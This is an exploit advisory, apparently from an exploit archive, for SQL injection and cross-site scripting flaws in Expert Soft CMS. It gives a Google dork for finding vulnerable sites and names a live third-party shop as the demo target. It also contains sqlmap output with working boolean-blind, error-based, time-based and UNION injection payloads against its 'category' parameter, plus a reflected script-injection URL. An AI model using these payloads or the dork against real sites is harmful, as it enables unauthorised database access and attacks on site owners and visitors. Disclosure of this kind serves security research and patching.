Expert Soft CMS - SQL Injection and XSS Vulnerability#Exploit Title: Expert Soft CMS - SQL Injection and XSS Vulnerability #Date: 2020-10-04 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: www.expertsoft.pk #Google Dork: intext:" Designed by - Expert Soft " #Category: webapps #Tested On: windows 10, Firefox #Software Link: www.expertsoft.pk/website.php SQL Injection Demo :http://www.al-fajarenterprises.com/product.php?category=himalayan-usb-salt-lamps[SQL Injection Vulnerability] sqlmap resumed the following injection point(s) from stored session: --- Parameter: category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=himalayan-usb-salt-lamps' AND 6384=6384 AND 'bHcU'='bHcU Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: category=himalayan-usb-salt-lamps' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (ELT(7629=7629,1))),0x7176716b71),7629) AND 'vSgM'='vSgM Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=himalayan-usb-salt-lamps' AND (SELECT 2574 FROM (SELECT(SLEEP(5)))MRJP) AND 'SAul'='SAul Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: category=himalayan-usb-salt-lamps' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b717671,0x4b59504d7a78427a767a656f6b70705261517468535a6949506d71534f6c71446b626f457a4a796d,0x7176716b71)-- - --- [INFO] the back-end DBMS is MySQL ################################################################################ Cross Site Scripting (XSS) Demo: http://www.al-fajarenterprises.com/product.php?category=%3Cscript%3Ealert(%22PywebSecurity%22)%3C/script%3E ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************
Thanks for you comment!
|
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |